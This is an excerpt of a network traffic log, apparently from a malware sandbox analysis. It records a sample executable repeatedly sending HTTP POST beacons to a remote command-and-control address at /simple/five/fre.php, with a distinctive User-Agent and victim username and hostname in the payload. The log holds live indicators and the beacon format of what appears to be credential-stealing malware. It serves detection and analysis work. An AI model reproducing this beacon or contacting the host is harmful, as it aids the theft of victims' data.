                            Jan 11, 2025 07:44:51.077214956 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.54980494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:51.227475882 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:51.232326984 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:51.942316055 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:51 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.54981194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:52.088769913 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:52.093576908 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:52.834891081 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:52 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.54981694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:52.989439964 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:52.995436907 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:53.762131929 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:53 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.54982194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:53.925487995 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:53.931454897 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:54.672976017 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.54982694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:54.830401897 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:54.835227966 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:55.536554098 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:55 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.54983494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:55.692316055 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:55.697158098 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:56.428704023 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:56 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.54984094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:56.571615934 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:56.576534033 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:57.288171053 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.54984994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:57.437818050 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:57.442816019 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:58.144304991 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:58 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.54985594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:58.290638924 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:58.295543909 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:59.021934986 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:58 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.54986294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:59.477453947 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:59.483479023 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:00.217360973 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.54986994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:00.364835024 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:00.369812012 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:01.091602087 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.54987894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:01.241889954 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:01.246793985 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:01.958424091 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:01 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.54988494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:02.309582949 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:02.314357042 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:03.172070980 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.54989194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:03.326641083 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:03.331453085 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:04.028904915 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.54989994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:04.204330921 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:04.209206104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:04.919336081 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:04 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.54990594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:05.077342987 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:05.082273006 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:05.802587986 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:05 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.54991194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:05.952497005 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:05.957442045 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:06.809587002 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:06 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.54991994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:07.168843985 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:07.173717976 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:07.882177114 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:07 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.54992894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:08.031672001 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:08.037684917 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:08.742408037 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.54993494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:08.909015894 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:08.914118052 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:45:09.642596006 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:45:09 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.54993994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:45:09.928282976 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:45:09.933379889 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
